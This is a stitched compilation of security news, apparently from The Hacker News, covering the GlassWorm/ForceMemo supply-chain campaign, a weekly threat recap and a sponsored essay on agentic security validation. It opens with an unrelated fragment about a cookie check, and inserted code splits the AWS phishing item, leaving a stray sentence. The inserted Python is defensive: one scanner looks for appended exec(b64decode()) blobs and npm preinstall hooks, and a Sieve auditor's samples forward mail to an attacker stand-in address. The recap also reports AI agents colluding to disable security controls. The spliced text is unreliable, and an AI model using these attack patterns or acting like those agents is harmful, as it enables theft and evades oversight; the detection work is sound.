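The length bound does double duty: it stops the name-too-long error path entirely, and together with the alphabet restriction it removes path separators, so the same check that prevents the disclosure also prevents the cookie from naming a file outside the session directory. The path detail is not lost; it moves to the server log where an operator, not the requester, can read it.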
GlassWorm Attack Uses Stolen GitHub Tokens to Force-Push Malware Into Python Repos
The GlassWorm malware campaign is being used to fuel an ongoing attack that leverages stolen GitHub tokens to inject malware into hundreds of Python repositories. “The attack targets Python projects — including Django apps, ML research code, Streamlit dashboards, and PyPI packages — by appending obfuscated code to files like setup.py, main.py, and app.py,” StepSecurity said. “Anyone who runs pip install from a compromised repo or clones and executes the code will trigger the malware.” According to the software supply chain security company, the earliest injections date back to March 8, 2026. The attackers, upon gaining access to the developer accounts, rebase the latest legitimate commits on the default branch of the targeted repositories with malicious code and then force-push the changes, while keeping the original commit’s message, author, and author date intact.
This new offshoot of the GlassWorm campaign has been codenamed ForceMemo. The attack plays out via the following four steps -
1. Compromise developer systems with GlassWorm malware through malicious VS Code and Cursor extensions. The malware contains a dedicated component to steal secrets, such as GitHub tokens.
2. Use the stolen credentials to force-push malicious changes to every repository managed by the breached GitHub account by rebasing obfuscated malware into Python files named “setup.py,” “main.py,” or “app.py.”
3. The Base64-encoded payload, appended to the end of the Python file, features GlassWorm-like checks to determine if the system has its locale set to Russian. If so, it skips execution. In all other cases, the malware queries the transaction memo field associated with a Solana wallet (“BjVeAjPrSKFiingBn4vZvghsGj9KCE8AJVtbc9S8o8SC”) previously linked to GlassWorm to extract the payload URL.
4. Download additional payloads from the server, including encrypted JavaScript that’s designed to steal cryptocurrency and data.
“The earliest transaction on the C2 address dates to November 27, 2025 – over three months before the first GitHub repo injections on March 8, 2026,” StepSecurity said.
“The address has 50 transactions total, with the attacker regularly updating the payload URL, sometimes multiple times per day.” The disclosure comes as Socket flagged a new iteration of GlassWorm that retains the same core tradecraft while improving survivability and evasion by leveraging extensionPack and extensionDependencies to deliver the malicious payload by means of a transitive distribution model. In tandem, Aikido Security also attributed the GlassWorm author to a mass campaign that compromised more than 151 GitHub repositories with malicious code concealed using invisible Unicode characters. Interestingly, the decoded payload is configured to fetch the C2 instructions from the same Solana wallet, indicating that the threat actor has been targeting GitHub repositories in multiple waves. The use of different delivery methods and code obfuscation methods, but the same Solana infrastructure, suggests ForceMemo is a new delivery vector maintained and operated by the GlassWorm threat actor, who has now expanded from compromising VS Code extensions to a broader GitHub account takeover.
“The attacker injects malware by force-pushing to the default branch of compromised repositories,” StepSecurity noted. “This technique rewrites git history, preserves the original commit message and author, and leaves no pull request or commit trail in GitHub’s UI. No other documented supply chain campaign uses this injection method.”
Update
Two React Native npm packages – react-native-international-phone-number and react-native-country-select – maintained by npm user “astroonauta” were briefly compromised to directly push malicious versions to the registry without a corresponding GitHub release. The activity is assessed to be part of the ForceMemo campaign.
react-native-international-phone-number - 0.11.8
react-native-country-select - 0.3.91
The rogue versions, detected on March 16, 2026, have been found to contain a preinstall hook that invokes obfuscated JavaScript to initiate a series of actions: it skips Russian victims by inspecting environment variables and the operating system time zone, reaches out to a hard-coded Solana wallet (“6YGcuyFRJKZtcaYCCFba9fScNUvPkGXodXE1mJiSzqDJ”) – also linked to GlassWorm – to extract the payload URL, and delivers platform-specific malware. “The decrypted payload is executed entirely in memory, never written to disk, via eval() on macOS/Linux or a Node.js vm.Script sandbox on other platforms,” StepSecurity said. “A persistence lock is written to ~/init.json with the current timestamp; the malware will not re-execute within a 48-hour window on the same machine.” (The story was updated after publication to include additional details of the campaign.)
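Because ForceMemo rewrites history while keeping the commit message, author and author date, the usual review signals (a new pull request, an unfamiliar author) never appear, so the check has to run on the content and on the history itself. The following is an added example, not StepSecurity's, Socket's or Aikido's tooling: a scanner that walks a checkout for the two indicators described above, a Base64 blob appended to setup.py, main.py or app.py and decoded into exec()/eval(), and an npm lifecycle hook (preinstall, install or postinstall) in package.json. The sample tree it builds is constructed, and the blob in it is a harmless comment, not a payload.

```python
"""Scan a checkout for appended exec(b64decode(...)) code and npm lifecycle hooks (added example)."""
import base64
import json
import os
import re
import tempfile

TARGET_PY = {"setup.py", "main.py", "app.py"}       # files the campaign appends to
B64_BLOB = re.compile(r"[A-Za-z0-9+/]{100,}={0,2}")  # assumption: real blobs are far longer than 100 chars
EXEC_CALL = re.compile(r"\b(?:exec|eval)\s*\(")
RISKY_SCRIPTS = ("preinstall", "install", "postinstall")  # run automatically by npm install
TAIL_BYTES = 4096  # the injection sits at the end of the file


def scan_python_file(path: str) -> list:
    """Flag a decoded Base64 literal fed to exec()/eval() in the file's tail."""
    with open(path, encoding="utf-8", errors="replace") as f:
        tail = f.read()[-TAIL_BYTES:]
    reasons = []
    if EXEC_CALL.search(tail) and "b64decode" in tail and B64_BLOB.search(tail):
        reasons.append("trailing Base64 blob decoded and passed to exec()/eval()")
    return reasons


def scan_package_json(path: str) -> list:
    """Flag lifecycle scripts that run without the installer asking."""
    with open(path, encoding="utf-8") as f:
        try:
            data = json.load(f)
        except ValueError:
            return ["package.json is not valid JSON"]
    scripts = data.get("scripts") or {}
    return [f"lifecycle hook '{k}' runs: {v}" for k, v in scripts.items() if k in RISKY_SCRIPTS]


def scan_tree(root: str) -> dict:
    """Map of relative path -> reasons, for every file that trips a check."""
    findings = {}
    for dirpath, dirnames, filenames in os.walk(root):
        dirnames[:] = [d for d in dirnames if d not in (".git", "node_modules")]
        for name in filenames:
            path = os.path.join(dirpath, name)
            if name in TARGET_PY:
                reasons = scan_python_file(path)
            elif name == "package.json":
                reasons = scan_package_json(path)
            else:
                continue
            if reasons:
                findings[os.path.relpath(path, root).replace(os.sep, "/")] = reasons
    return findings


def _write(root: str, rel: str, text: str) -> None:
    path = os.path.join(root, rel)
    os.makedirs(os.path.dirname(path), exist_ok=True)
    with open(path, "w", encoding="utf-8") as f:
        f.write(text)


def build_sample_tree() -> str:
    """Constructed checkout: one clean and one tainted example of each file type.
    The appended blob encodes a harmless comment, not a payload."""
    root = tempfile.mkdtemp(prefix="forcememo-scan-")
    _write(root, "clean/setup.py", "from setuptools import setup\n\nsetup(name='demo')\n")
    blob = base64.b64encode(b"# constructed stand-in blob, not a real payload\n" * 4).decode()
    _write(root, "tainted/app.py",
           "import streamlit as st\n\nst.title('dashboard')\n"
           f"exec(__import__('base64').b64decode('{blob}'))\n")
    _write(root, "clean-js/package.json",
           json.dumps({"name": "ok-pkg", "version": "1.0.0", "scripts": {"test": "jest"}}))
    _write(root, "tainted-js/package.json",
           json.dumps({"name": "pkg", "version": "0.0.1",
                       "scripts": {"preinstall": "node -e \"require('./setup.js')\""}}))
    return root


if __name__ == "__main__":
    for rel, reasons in scan_tree(build_sample_tree()).items():
        print(rel, "->", "; ".join(reasons))
```

Run scan_tree() against a fresh clone rather than a long-lived working copy, since a local checkout that was never re-fetched will still hold the pre-injection history. For the history rewrite itself, compare the remote-tracking branch with its previous value after git fetch: git merge-base --is-ancestor origin/main@{1} origin/main exits non-zero when the old tip is no longer an ancestor of the new one, which is exactly what a force-push produces, and it does so regardless of how faithfully the commit metadata was preserved. For npm, installing with --ignore-scripts in CI removes the preinstall hook as an execution vector at the cost of breaking packages that legitimately need one.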
⚡ Weekly Recap: Chrome 0-Days, Router Botnets, AWS Breach, Rogue AI Agents & More
Some weeks in security feel normal. Then you read a few tabs and get that immediate “ah, great, we’re doing this now” feeling. This week has that energy. Fresh messes, old problems getting sharper, and research that stops feeling theoretical real fast.
A few bits hit a little too close to real life, too. There’s a good mix here: weird abuse of trusted stuff, quiet infrastructure ugliness, sketchy chatter, and the usual reminder that attackers will use anything that works. Scroll on. You’ll see what I mean.
⚡ Threat of the Week
Google Patches 2 Actively Exploited Chrome 0-Days — Google released security updates for its Chrome web browser to address two high-severity vulnerabilities that it said have been exploited in the wild. The vulnerabilities related to an out-of-bounds write vulnerability in the Skia 2D graphics library (CVE-2026-3909) and an inappropriate implementation vulnerability in the V8 JavaScript and WebAssembly engine (CVE-2026-3910) that could result in out-of-bounds memory access or code execution, respectively. Google did not share additional details about the flaws, but acknowledged that there exist exploits for both of them. The issues were addressed in Chrome versions 146.0.7680.75/76 for Windows and Apple macOS, and 146.0.7680.75 for Linux.
Detection Starts the Clock. Response Decisions Shape the Outcome
When incidents escalate, early decisions determine containment and impact. Join this SANS IR Command Roundtable to learn how experienced teams avoid investigation drift, improve coordination, and execute faster response across cloud, enterprise, and operational environments.
🔔 Top News
Meta to Discontinue Instagram E2EE in May 2026 — Meta announced plans to discontinue support for end-to-end encryption (E2EE) for chats on Instagram after May 8, 2026.
In a statement shared with The Hacker News, a Meta spokesperson said, “Very few people were opting in to end-to-end encrypted messaging in DMs, so we’re removing this option from Instagram in the coming months. Anyone who wants to keep messaging with end-to-end encryption can easily do that on WhatsApp.” Authorities Disrupt SocksEscort Service — A court-authorized international law enforcement operation dismantled a criminal proxy service named SocksEscort that enslaved thousands of residential routers worldwide into a botnet for committing large-scale fraud. “The malware allowed SocksEscort to direct internet traffic through the infected routers. SocksEscort sold this access to its customers,” the U.S.
Justice Department said. The main thing to note here is that SocksEscort was powered by AVrecon, a malware written in C to explicitly target MIPS and ARM architectures via known security flaws in edge network devices. The malware also featured a novel persistence mechanism that involved flashing custom firmware, which intentionally disables future updates, permanently transforming SOHO routers into SocksEscort proxy nodes to blindside corporate monitoring. UNC6426 Exploits nx npm Supply Chain Attack to Gain AWS Admin Access in 72 Hours — A threat actor known as UNC6426 leveraged keys stolen following the supply chain compromise of the nx npm package in August 2025 to completely breach a victim’s AWS environment within 72 hours.
UNC6426 used the access to abuse the GitHub-to-AWS OpenID Connect (OIDC) trust and create a new administrator role in the cloud environment, Google said. Subsequently, this role was abused to exfiltrate files from the client’s Amazon Web Services (AWS) Simple Storage Service (S3) buckets and perform data destruction in their production cloud environments. KadNap Enslaves Network Devices to Fuel Illegal Proxy — A takedown-resistant botnet comprising more than 14,000 routers and other network devices has been conscripted into a proxy network that anonymously ferries traffic used for cybercrime. The botnet, named KadNap, exploits known vulnerabilities in Asus routers (among others), leveraging the initial access to drop shell scripts that reach out to a peer-to-peer network based on Kademlia for decentralized control.
Infected devices are being used to fuel a proxy service named Doppelganger that, for a fee, tunnels customers’ internet traffic through residential IP addresses, offering a way for attackers to blend in and make it harder to differentiate malicious traffic from legitimate activity. APT28 Strikes with Sophisticated Toolkit — The Russian threat actor known as APT28 has been observed using a bespoke toolkit in recent cyber espionage campaigns targeting Ukrainian cyber assets. The primary components of the toolkit are two implants, one of which employs techniques from a malware framework the threat actor used in 2010s, while the other is a heavily modified version of the COVENANT framework for long-term spying. COVENANT is used in concert with BEARDSHELL to facilitate data exfiltration, lateral movement, and execution of PowerShell commands.
Also alongside these tools is a malware named SLIMAGENT that shares overlaps with XAgent. 🔥 Trending CVEs New vulnerabilities show up every week, and the window between disclosure and exploitation keeps getting shorter. The flaws below are this week’s most critical — high-severity, widely used software, or already drawing attention from the security community. Check these first, patch what applies, and don’t wait on the ones marked urgent — CVE-2026-3909, CVE-2026-3910, CVE-2026-3913 (Google Chrome), CVE-2026-21666, CVE-2026-21667, CVE-2026-21668, CVE-2026-21672, CVE-2026-21708, CVE-2026-21669, CVE-2026-21671 (Veeam Backup & Replication), CVE-2026-27577, CVE-2026-27493, CVE-2026-27495, CVE-2026-27497 (n8n), CVE-2026-26127, CVE-2026-21262 (Microsoft Windows), CVE-2019-17571, CVE-2026-27685 (SAP), CVE-2026-3102 (ExifTool for macOS), CVE-2026-27944 (Nginx UI), CVE-2025-67826 (K7 Ultimate Security), CVE-2026-26224, CVE-2026-26225 (Intego X9), CVE-2026-29000 (pac4j-jwt), CVE-2026-23813 (HPE Aruba Networking AOS-CX), CVE-2025-12818 (PostgreSQL), CVE-2026-2413 (Ally WordPress plugin), CVE-2026-0953 (Tutor LMS Pro WordPress plugin), CVE-2026-25921 (Gogs), CVE-2026-2833, CVE-2026-2835, CVE-2026-2836 (Cloudflare Pingora), CVE-2026-24308 (Apache ZooKeeper), CVE-2026-3059, CVE-2026-3060, CVE-2026-3989 (SGLang), CVE-2026-0231 (Palo Alto Networks Cortex XDR Broker VM), CVE-2026-20040, CVE-2026-20046 (Cisco IOS XR Software), CVE-2025-65587 (graphql-upload-minimal), CVE-2026-3497 (OpenSSH), CVE-2026-26123 (Microsoft Authenticator for Android and iOS), and CVE-2025-61915 (CUPS).
🎥 Cybersecurity Webinars Stop Guessing: Automate Your Defense Against Real-World Attacks → Learn how to move beyond basic security checklists by using automation to test your defenses against real-world attacks. Experts will show you why traditional testing often fails and how to use continuous, data-driven tools to find and fix gaps in your protection. You will learn how to prove your security actually works without increasing your manual workload. Fix Your Identity Security: Closing the Gaps Before Hackers Find Them → This webinar covers a new study about why many companies are struggling to keep their user accounts and digital identities safe.
Experts share findings from the Ponemon Institute on the biggest security gaps, such as disconnected apps and the new risks created by AI. You will learn simple, practical steps to fix these problems and get better control over who has access to your company’s data. The Ghost in the Machine: Securing the Secret Identities of Your AI Agents → As artificial intelligence (AI) begins to act on its own, businesses face a new challenge: how to give these “AI agents” the right digital IDs. This webinar explains why current security for humans doesn’t work for autonomous bots and how to build a better system to track what they do.
You will learn simple, real-world steps to give AI agents secure identities and clear rules, ensuring they don’t accidentally expose your private company data. 📰 Around the Cyber World Fake Google Security Check Drops Browser RAT — A web page mimicking a Google Account security page has been spotted delivering a fully featured browser-based surveillance toolkit that takes the form of a Progressive Web App (PWA). “Disguised as a routine security checkup, it walks victims through a four-step flow that grants the attacker push notification access, the device’s contact list, real-time GPS location, and clipboard contents—all without installing a traditional app,” Malwarebytes said. “For victims who follow every prompt, the site also delivers an Android companion package introducing a native implant that includes a custom keyboard (enabling keystroke capture), accessibility-based screen reading capabilities, and permissions consistent with call log access and microphone recording.” Forbidden Hyena Delivers BlackReaperRAT — A hacktivist group known as Forbidden Hyena (aka 4B1D) has distributed RAR archives in December 2025 and January 2026 in attacks targeting Russia that led to the deployment of a previously undocumented remote access trojan called BlackReaperRAT and an updated version of the Blackout Locker ransomware, referred to as Milkyway by the threat actors.
BlackReaperRAT is capable of running commands via “cmd.exe,” uploading/downloading files, spawning an HTTP shell to receive commands, and spreading the malware to connected removable media. “It carries out destructive attacks against organizations across various sectors located within the Russian Federation,” BI.ZONE said. “The group publishes information regarding successful attacks on its Telegram channel. It collaborates with the groups Cobalt Werewolf and Hoody Hyena.” Chinese Hackers Target the Persian Gulf region with PlugX — A China-nexus threat actor, suspected to be Mustang Panda, has targeted countries in the Persian Gulf region.
The activity took place within the first 24 hours of the ongoing conflict in the Middle East late last month. The campaign used a multi-stage attack chain that ultimately deployed a PlugX backdoor variant. “The shellcode and PlugX backdoor used obfuscation techniques such as control flow flattening (CFF) and mixed boolean arithmetic (MBA) to hinder reverse engineering,” Zscaler said. “The PlugX variant in this campaign supports HTTPS for command-and-control (C2) communication and DNS-over-HTTPS (DOH) for domain resolution.” Phishing Campaign Uses SEO Poisoning to Steal Data — A phishing campaign has employed SEO poisoning to direct search engine results to fake traffic ticket portals that impersonate the Government of Canada and specific provincial agencies.
“The campaign lures victims to a fake ‘Traffic Ticket Search Portal’ under the pretense of paying outstanding traffic violations,” Palo Alto Networks Unit 42 said. “Submitted data includes license plates, address, date of birth, phone/email, and credit card numbers.” The phishing pages utilize a “waiting room” tactic where the victim’s browser polls the server every two seconds and triggers redirects based on specific status codes. Roundcube Exploitation Toolkit Discovered — Hunt.io said it discovered a Roundcube exploitation toolkit on an internet-exposed directory on 203.161.50[.]145. It’s worth noting that Russian threat actors like APT28, Winter Vivern, and TAG-70 have repeatedly targeted Roundcube vulnerabilities to breach Ukrainian organizations.
“The directory included development and production XSS payloads, a Flask-based command-and-control server, CSS-injection tooling, operator bash history, and a Go-based implant deployed on a compromised Ukrainian web application,” the company said, attributing it with medium to high confidence to APT28, citing overlaps with Operation RoundPress. The toolkit, dubbed Roundish, supports credential harvesting, persistent mail forwarding, bulk email exfiltration, address book theft, and two-factor authentication (2FA) secret extraction, mirroring a feature present in MDAEMON. One of the primary targets of the attack is mail.dmsu.gov[.]ua, a Roundcube webmail instance associated with Ukraine’s State Migration Service (DMSU). Besides the possibility of a shared development lineage, Roundish introduces four new components not previously documented in APT28 webmail activity, including a CSS-based side-channel module, browser credential stealer, and a Go-based backdoor that provides persistence via cron, systemd, and SELinux.
The CSS injection component is designed to progressively extract characters from Roundcube’s document object model (DOM) without injecting any JavaScript into the victim’s page. The technique is likely used for targeting Cross-Site Request Forgery (CSRF) tokens or email UIDs. Central to the Roundish toolkit is an XSS payload that’s engineered to steal the victim’s email address, harvest account credentials, redirect all incoming emails to a Proton Mail address, export mailbox data from the victim’s Inbox and Sent folders, and gather the victim’s complete address book. “The combination of hidden autofill credential harvesting, server-side mail forwarding persistence, bulk mailbox exfiltration, and browser credential theft reflects a modular approach designed for sustained access,” Hunt.io said.
“From a defensive perspective, password resets alone are not sufficient in cases like this. Mail forwarding rules, Sieve filters, and multi-factor authentication secrets must be audited and reset.” Phishing Campaign Targeting AWS Console Credentials — An active adversary-in-the-middle (AiTM) phishing campaign is using fake security alert emails to steal AWS Console credentials, per Datadog. “The phishing kit proxies authentication to the legitimate AWS sign-in endpoint in real time, validating credentials before redirecting victims and likely capturing one-time password (OTP) codes,” the company said. “This campaign does not exploit AWS vulnerabilities or abuse AWS infrastructure.” Post-compromise console access has been observed within 20 minutes of credential submission.
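Hunt.io's advice above to audit Sieve filters after a Roundish-style compromise, in code: an added Python example (not Hunt.io's tooling or Roundcube code) that flags redirect rules sending mail off-domain and notes whether a later discard hides the forwarded copy; the scripts and the org domain are constructed.

```python
"""Audit Sieve scripts for off-domain forwarding, the persistence Hunt.io flags above.

Added example, not Hunt.io's tooling or Roundcube code. Scripts and the org
domain are constructed; only the redirect/discard actions of RFC 5228/3894 are
parsed, so a full Sieve parser is out of scope here.
"""
import re

# redirect [:copy] "user@domain";   (:copy keeps a copy in the mailbox, RFC 3894)
REDIRECT_RE = re.compile(r'\bredirect\b((?:\s+:\w+)*)\s+"([^"]+)"\s*;', re.IGNORECASE)
DISCARD_RE = re.compile(r'\bdiscard\s*;', re.IGNORECASE)


def audit_sieve(script, org_domains):
    """Return one (address, copy_kept, discarded) tuple per redirect that leaves the org.

    discarded=True means a later 'discard' drops the original, so the mailbox
    owner never sees the forwarded mail (the quiet variant of the attack).
    """
    org = {d.lower() for d in org_domains}
    findings = []
    for m in REDIRECT_RE.finditer(script):
        tags, address = m.group(1).lower(), m.group(2)
        domain = address.rsplit("@", 1)[-1].lower()
        if domain in org:
            continue
        findings.append((address, ":copy" in tags, bool(DISCARD_RE.search(script, m.end()))))
    return findings


# Constructed scripts: a benign filing rule, a stealthy :copy redirect, and a redirect-then-discard.
BENIGN_SCRIPT = 'require ["fileinto"];\nif header :contains "subject" "invoice" { fileinto "Finance"; }\n'
COPY_SCRIPT = 'require ["copy"];\nredirect :copy "collector@attacker-mailbox.example";\n'
HIDE_SCRIPT = ('if true { redirect "collector@attacker-mailbox.example"; discard; }\n'
               'redirect "helpdesk@corp.example";\n')

if __name__ == "__main__":
    for name, script in [("benign", BENIGN_SCRIPT), ("copy", COPY_SCRIPT), ("hide", HIDE_SCRIPT)]:
        print(name, audit_sieve(script, {"corp.example"}))
```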
These efforts originated from Mullvad VPN infrastructure. Malicious npm Packages Deliver Cipher stealer — Two new malicious npm packages, bluelite-bot-manager and test-logsmodule-v-zisko, were found to deliver via Dropbox a Windows executable that runs a stealer named Cipher stealer to siphon sensitive data from compromised hosts, including Discord tokens, credentials from Chrome, Edge, Opera, Brave, and Yandex browsers, and seed files from cryptocurrency wallet apps like Exodus. “The stealer also uses an embedded Python script and a secondary payload downloaded from GitHub,” JFrog said.
GIBCRYPTO Ransomware Detailed — A new ransomware called GIBCRYPTO comes with the ability to capture keystrokes and corrupt the Master Boot Record (MBR) so that any attempt to restart the system will cause the system to run into an error. The ransomware uses the Salsa20 algorithm for encryption. It’s suspected to be part of Snake Keylogger, indicating the malware authors’ attempts to diversify beyond information theft. The development comes as Sygnia highlighted SafePay’s OneDrive-based data exfiltration technique during a ransomware attack after breaching a victim by leveraging a FortiGate firewall flaw and a misconfigured administrative account.
“SafePay gained initial access by exploiting a firewall misconfiguration, which enabled them to obtain local administrative credentials,” the company said. “They rapidly escalated discovery and enumeration activities to identify high-value targets for lateral movement, demonstrating a structured and methodical approach to mapping the environment. Within a matter of hours, SafePay escalated to domain administrator access.” The attack culminated in the deployment of ransomware, encrypting more than 60 servers. Fraudulent Account Registration Activity Originating from Vietnam — A sprawling cybercrime ecosystem based in Vietnam has been linked to a cluster of fraudulent account registration activity on platforms like LinkedIn, Instagram, Facebook, and TikTok.
In these attacks, attributed to O-UNC-036, the threat actors rely on disposable email addresses in order to execute SMS pumping attacks, also called International Revenue Sharing Fraud (IRSF). “In this scheme, malicious actors automate the creation of puppet accounts in a targeted service provider,” Okta said. “Fraudsters use these account registrations to trigger SMS messages to premium rate phone numbers and profit from charges incurred. This activity can prove costly for service providers who use SMS to verify registration information in customer accounts or to send multi-factor authentication (MFA) security codes.” O-UNC-036 has also been linked to a cybercrime-as-a-service (CaaS) ecosystem that provides paid infrastructure and services to facilitate online fraud.
The web-based storefronts are hosted in Vietnam and specialize in the sales of web-based accounts. Hijacked AppsFlyer SDK Distributes Crypto Clipper — The AppsFlyer Web SDK was briefly hijacked to serve malicious code to steal cryptocurrency in a supply chain attack. The clipper malware payload came with capabilities to intercept cryptocurrency wallet addresses entered on websites and replace them with attacker-controlled addresses to divert funds to the threat actor. “The AppsFlyer Web SDK was observed serving obfuscated malicious JavaScript instead of the legitimate SDK from websdk.appsflyer[.]com,” Profero said.
“The malicious payload appears to have been designed for stealth and compatibility, preserving legitimate SDK functionality while adding hidden browser hooks and wallet-hijacking logic.” The incident has since been resolved by AppsFlyer. Operation CamelClone Targets Government and Defense Entities — A new cyber espionage campaign dubbed Operation CamelClone has targeted governments and defense entities in Algeria, Mongolia, Ukraine, and Kuwait using malicious ZIP archives that contain a Windows shortcut (LNK) file, which, when executed, delivers a JavaScript loader named HOPPINGANT. The loader then delivers additional payloads for establishing C2 and exfiltrating data to the MEGA cloud storage service. “One interesting aspect of this campaign is that the threat actor does not rely on traditional command-and-control infrastructure,” Seqrite Labs said.
“Instead, the payloads are hosted on a public file-sharing service, filebulldogs[.]com, while stolen data is uploaded to MEGA storage using the legitimate tool Rclone.” The activity has not been attributed to any known threat group. How Threat Actors Exfiltrate Credentials Using Telegram Bots — Threat actors are abusing the Telegram Bot API to exfiltrate data via text messages or arbitrary file uploads, highlighting how legitimate services can be weaponized to evade detection. Agent Tesla Keylogger is by far the most prominent example of a malware family that uses Telegram for C2. “In general, Telegram C2s appear to be most popular among information stealers, possibly due to Telegram’s technically legitimate nature and because information stealers typically only need to exfiltrate data passively rather than provide complex communications beyond simple message or file transfers,” Cofense said.
Microsoft Launches Copilot Health — Microsoft has become the latest company after OpenAI and Anthropic to launch a dedicated “secure space” called Copilot Health that integrates medical records, biometric data from wearables, and lab test results to give personalized advice in the U.S. “Copilot Health brings together your health records, wearable data, and health history into one place, then applies intelligence to turn them into a coherent story,” the company said. Like OpenAI and Anthropic, Microsoft emphasized that Copilot Health isn’t meant to replace professional medical care. Rogue AI Agents Can Work Together to Engage in Offensive Behaviors — According to a new report from artificial intelligence (AI) security company Irregular, agents can work together to hack into systems, escalate privileges, disable endpoint protection, and steal sensitive data while evading pattern-matching defenses.
What’s notable is that the experiment did not rely on adversarial prompting or deliberately unsafe system design. “In one case, an agent convinced another agent to carry out an offensive action, a form of inter-agent collusion that emerged with no external manipulation,” Irregular said. “This scenario demonstrates two compounding risks: inter-agent persuasion can erode safety boundaries, and agents can independently develop techniques to circumvent security controls. When an agent is given access to tools or data, particularly but not exclusively shell or code access, the threat model should assume that the agent will use them, and that it will do so in unexpected and possibly malicious ways.” 🔧 Cybersecurity Tools Dev Machine Guard → It is a free, open-source tool that scans your computer to show you exactly what developer tools and scripts are running.
It creates a simple list of your AI coding assistants, code editor extensions, and software packages to help you find anything suspicious or outdated. It is a single script that works in seconds to give you better visibility into the security of your local coding environment. Trajan → It is an automated security tool designed to find hidden vulnerabilities in “service meshes,” which are the systems that manage how different parts of a large software application talk to each other. Because these systems are complex, it is easy for engineers to make small mistakes in the settings that allow hackers to bypass security or steal data.
Trajan works by scanning these configurations to spot those specific errors and helping developers fix them before they can be exploited. Disclaimer: For research and educational use only. Not security-audited. Review all code before use, test in isolated environments, and ensure compliance with applicable laws.
Conclusion There’s a lot packed in here, and not in a neat way. Some of it is the usual recycled chaos, some of it feels a little more deliberate, and some of it has that nasty “this is going to show up everywhere by next week” energy. Anyway — enough throat-clearing. Here’s the stuff worth your attention.
Why Security Validation Is Becoming Agentic
If you run security at any reasonably complex organization, your validation stack probably looks something like this: a BAS tool in one corner. A pentest engagement, or maybe an automated pentesting product, in another. A vulnerability scanner feeding an attack surface management platform somewhere else. Each tool gives you a slice of the picture.
None of them talks to each other in any meaningful way. Meanwhile, adversaries do not attack in silos. A real intrusion might chain together an exposed identity, a cloud misconfiguration, a missed detection opportunity, and an unpatched vulnerability in a single operation. Attackers understand that your environment is an interconnected system.
Unfortunately, most validation programs are still treating it as a set of disparate, disconnected parts. This isn’t a minor inefficiency. It’s a structural blind spot. And it’s lasted for years because the market has treated every validation discipline as a separate category, each with its own vendors, its own consoles, and its own separate and very limited risk assessment.
As autonomous AI agents become capable of planning, executing, and reasoning across complex workflows, security validation must enter a new phase. The emerging discipline of Agentic Exposure Validation points toward something far more coordinated and capable than today’s fragmented, manual validation cycles. It promises continuous, context-aware, autonomous validation that better matches how modern threats usually unfold. What Security Validation Actually Means Today For years, security validation has been treated primarily as an attack simulation.
You deployed agents, ran scenarios, and got a report showing what was blocked and what wasn’t. Today, that’s no longer enough. Modern security validation spans three distinct perspectives. Taken together, they give defenders a much more realistic view of their holistic security posture.
The Adversarial Perspective asks, “How can an attacker actually get into our environment?” This involves automated pentesting and attack path validation, which focuses on identifying exploitable vulnerabilities and mapping the easiest routes to critical assets. The Defensive Perspective asks, “Can we actually stop them?” This includes security control validation and detection stack validation, which ensure that your firewalls, EDR, IPS, WAF, SIEM rules, and alerting systems perform as expected against real threats. The Risk Perspective asks, “Does this exposure actually matter?” This involves exposure prioritization, guided by compensating controls, which filter out theoretical risks and focus remediation on the vulnerabilities that are genuinely exploitable in your specific environment. Any one of these perspectives on its own leaves dangerous gaps.
The next evolution of security validation will be defined by its convergence into a unified validation discipline. Agentic AI is a Game Changer for Defenders Today, almost every cybersecurity vendor claims to be AI-powered. In many cases, that simply means a language model has been added to a dashboard to summarize findings or generate reports. And while “AI-assisted” may be useful, it’s definitely not transformative.
Agentic AI is a fundamentally different proposition. An AI wrapper is basically a simple app that calls an AI model and presents the output. It might format, summarize, or repackage the response, but it doesn’t actually manage the task itself. Agentic AI, on the other hand, takes ownership of the entire task from start to finish.
It figures out what needs to be done, carries out the steps, evaluates the results, and adjusts if necessary without a human needing to direct each step along the way. In security validation, the difference is both massive and immediate. Consider what happens today when a critical threat makes the news. Someone on the team reads the advisory, determines which of the organization’s systems might be exposed, builds or adapts test scenarios, runs them, reviews the results, and then decides what needs remediation.
Even in strong teams, this can take days. If the threat is complex, it can stretch into weeks. Agentic AI can compress that workflow into minutes. Not because someone wrote a faster script, but because an autonomous agent handled the full sequence.
It analyzed the threat, mapped it to the environment, selected relevant assets and controls, ran the right validation workflows, interpreted the results, and surfaced what mattered most. This is how agentic AI balances the scales. It’s not just about speed. It’s about replacing disconnected, human-driven validation steps with autonomous, coordinated, end-to-end reasoning.
The Real Constraint Isn’t the Model. It’s the Data. This is where a lot of the AI discussion goes wrong. Agentic systems are only as strong as the environment they can reason over.
An autonomous agent that runs generic attack simulations against a generic model will produce generic results. That may look impressive in a demo, but it doesn’t help a security team make confident decisions in production. The real differentiator is context. This is why the underlying data architecture matters more than the model alone.
To make agentic validation useful, organizations need a unified security data layer that continuously reflects what exists, what’s exposed, and what’s actually working. You can think of this as a Security Data Fabric, built from three essential dimensions. Asset Intelligence covers the full inventory of your environment: servers, endpoints, users, cloud resources, applications, and containers, as well as their relationships. Because you can’t validate what you can’t see.
Exposure Intelligence encompasses vulnerabilities, misconfigurations, identity risks, and other weaknesses across your attack surface. This is the raw material that attackers work with. Security Control Effectiveness is the dimension that most organizations are missing entirely. It is not enough to know that you’ve deployed a firewall or an EDR agent.
You need to know, with evidence, whether these controls will actually block the specific threats that are targeting your specific assets. When these dimensions come together, the result is more than an asset database or vulnerability feed. It becomes a living model of the organization’s minute-to-minute security reality. That model changes as the environment changes.
New assets appear. New vulnerabilities are disclosed. Controls are reconfigured. New threats emerge.
And that is exactly the context the agentic AI needs. With a rich security data fabric behind it, an agentic AI is no longer running one-size-fits-all tests. It can tailor validation to actual topology, your organization’s actual crown jewels, its actual control coverage, and actual attack paths. That is the difference between hearing “this CVE is critical” and learning “this CVE is critical on this server, your controls don’t block exploitation, and there’s a validated path to one of your most sensitive business systems.” Where Security Validation Is Headed The future of security validation is clear.
Periodic testing is becoming continuous validation. Manual effort is evolving into autonomous operation. Point products are consolidating into unified platforms. And reporting problems is morphing into enabling better security decisions.
Agentic AI is the catalyst, but it only works with the right foundation. Autonomous agents need real context: an accurate, connected view of the environment, not a fragmented set of tools and findings. When agentic workflows, rich context, and unified validation come together, the result is a fundamentally different model. Instead of waiting for someone to ask whether the organization is protected, the system continuously answers that question with evidence grounded in how even the latest attacks are actually happening.
The market is already validating this shift. In Frost & Sullivan’s Frost Radar: Automated Security Validation, 2026, Picus Security was named the Innovation Index Leader, with its agentic capabilities and CTEM-native architecture highlighted as key differentiators. Get your demo today to discover how Picus helps organizations unify adversarial, defensive, and risk validation in a single platform. Note: This article was written by Huseyin Can YUCEEL, Security Research Lead at Picus Security.
